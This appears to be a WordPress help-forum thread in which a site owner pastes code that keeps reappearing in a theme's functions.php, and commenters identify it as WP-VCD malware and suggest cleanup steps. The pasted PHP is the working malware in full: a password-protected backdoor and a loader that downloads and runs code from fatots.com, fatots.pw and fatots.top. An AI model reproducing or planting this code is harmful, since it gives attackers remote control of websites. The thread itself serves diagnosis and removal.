# Wordpress: I get a code added in wp-content/themes/mytheme/function.php automatically

Tags: wordpress, wordpress-theming

Not sure if this goes here. But thing is that I get a code added in wp-content/themes/mythemeChild/function.php automatically.

If I remove the code it get added again and again everytime I load my site:

This is the code:

```
//$start_wp_theme_tmp

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '4b705c1c67a8055f47ab7df9d283aae4'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {






                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {

                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                                case 'change_code';
                    if (isset($_REQUEST['newcode']))
                        {

                            if (!empty($_REQUEST['newcode']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }

        die("");
    }








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


$wp_auth_key='5dff57da9df6d10a701c2d632257ccd7';
        if (($tmpcontent = @file_get_contents("http://www.fatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.fatots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("http://www.fatots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 





    }
}


//wp_tmp


//$end_wp_theme_tmp
```

Comment: It's possible that you've been hacked: see [Sucuri's note about WP-VCD malware](http://labs.sucuri.net/?note=2017-12-06). If so, **don't panic**. Read this: [Help I think I've been hacked](https://codex.wordpress.org/FAQ_My_site_was_hacked) to begin with.

Comment: @PatJ Is there any way to clean completely this malware WP-VCD? The article you posted doesn't show a way to do this.

Comment: I came across this in my Googling, but I have **no experience** with WP-VCD, so I can't speak to how accurate it is: https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d

Answer (score 0, accepted):

What I did to solve problem:

1. In `wp-include` directory, delete `wp-vcd.php` and `class.wp.php` files
2. Open to theme's `functions.php` file, and delete the above codes

https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d

Read this article to remove this malware

Comment: If you have files like `wp-vcd.php` and `class.wp.php` (as opposed to **`class-wp.php`**) in your `wp-includes` directory, you might have been hacked (or else someone put something somewhere that they shouldn't have). See [Sucuri's note on WP-VCD malware](http://labs.sucuri.net/?note=2017-12-06).

Comment: i don`t think so if these files are present in my theme directory. Recently i have work on localhost and see  extra code in functions.php. so how can my site hacked if i work on localhost?

Comment: I also had wp-tmp.php and wp-feed.php filled with malicious code and a list of some IP addresses. Sorted everything in wp-include by date changed and they came to the top.